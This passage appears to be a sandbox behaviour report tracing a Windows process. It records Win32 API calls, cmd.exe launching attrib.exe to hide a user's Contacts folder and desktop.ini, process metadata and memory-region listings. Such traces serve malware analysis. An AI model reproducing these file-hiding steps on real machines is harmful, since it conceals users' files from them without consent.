lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile 
(in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 
[0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, 
lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 
lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: 
lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.369] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.369] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0218.370] _close (_FileHandle=3) returned 0 [0218.370] GetConsoleTitleW (in: lpConsoleTitle=0x16f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.370] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.370] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.370] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.370] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.371] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.371] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.371] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.371] GetConsoleTitleW (in: lpConsoleTitle=0x16f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f234 | out: lpAttributeList=0x16f16c, lpSize=0x16f234) returned 1 [0218.371] UpdateProcThreadAttribute (in: lpAttributeList=0x16f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f16c, lpPreviousValue=0x0) returned 1 [0218.371] GetStartupInfoW (in: lpStartupInfo=0x16f128 | out: lpStartupInfo=0x16f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.371] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.371] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f214 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessInformation=0x16f214*(hProcess=0x4c, hThread=0x50, dwProcessId=0x62c, dwThreadId=0xca0)) returned 1 [0218.373] CloseHandle (hObject=0x50) returned 1 [0218.373] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.373] GetEnvironmentStringsW () returned 0x212c70* [0218.373] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.373] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0218.416] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x16f108 | out: lpExitCode=0x16f108*=0x0) returned 1 [0218.416] CloseHandle (hObject=0x4c) returned 1 [0218.416] _vsnwprintf (in: _Buffer=0x16f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f114 | out: _Buffer="00000000") returned 8 [0218.416] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.416] GetEnvironmentStringsW () returned 0x212c70* [0218.416] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.416] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.416] GetEnvironmentStringsW () returned 0x212c70* [0218.416] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.416] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f16c | out: lpAttributeList=0x16f16c) [0218.416] GetConsoleTitleW (in: lpConsoleTitle=0x16f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.417] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.417] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.417] GetEnvironmentVariableW (in: lpName="PATHEXT", 
lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.417] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.417] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.417] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.417] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.417] GetConsoleTitleW (in: lpConsoleTitle=0x16f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.417] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f234 | out: lpAttributeList=0x16f16c, lpSize=0x16f234) returned 1 [0218.417] UpdateProcThreadAttribute (in: lpAttributeList=0x16f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f16c, lpPreviousValue=0x0) returned 1 [0218.417] GetStartupInfoW (in: lpStartupInfo=0x16f128 | out: lpStartupInfo=0x16f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.418] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.418] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f214 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessInformation=0x16f214*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfd0, dwThreadId=0xe70)) returned 1 [0218.419] CloseHandle (hObject=0x4c) returned 1 [0218.419] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.419] GetEnvironmentStringsW () returned 0x213628* [0218.420] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.420] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0218.476] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f108 | out: lpExitCode=0x16f108*=0x0) returned 1 [0218.477] CloseHandle (hObject=0x50) returned 1 [0218.477] _vsnwprintf (in: _Buffer=0x16f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f114 | out: _Buffer="00000000") returned 8 [0218.477] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.477] GetEnvironmentStringsW () returned 0x213628* [0218.477] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.477] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.477] GetEnvironmentStringsW () returned 0x213628* [0218.477] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.477] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f16c | out: lpAttributeList=0x16f16c) [0218.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.477] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.477] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.477] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.477] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.477] SetConsoleInputExeNameW () returned 0x1 [0218.477] 
GetConsoleOutputCP () returned 0x1b5 [0218.478] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.478] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.478] exit (_Code=0) Process: id = "562" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16840" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32616 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32617 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32618 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32619 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32620 start_va = 0x820000 end_va = 0x826fff entry_point = 0x820000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32621 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32622 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32623 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32624 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32625 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32626 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32627 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32628 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32629 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32630 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 32631 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32632 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32633 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32634 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32635 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32636 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32637 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32638 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32639 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32640 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32641 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32642 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32643 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 32644 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32645 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 766 os_tid = 0x64 Process: id = "563" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = 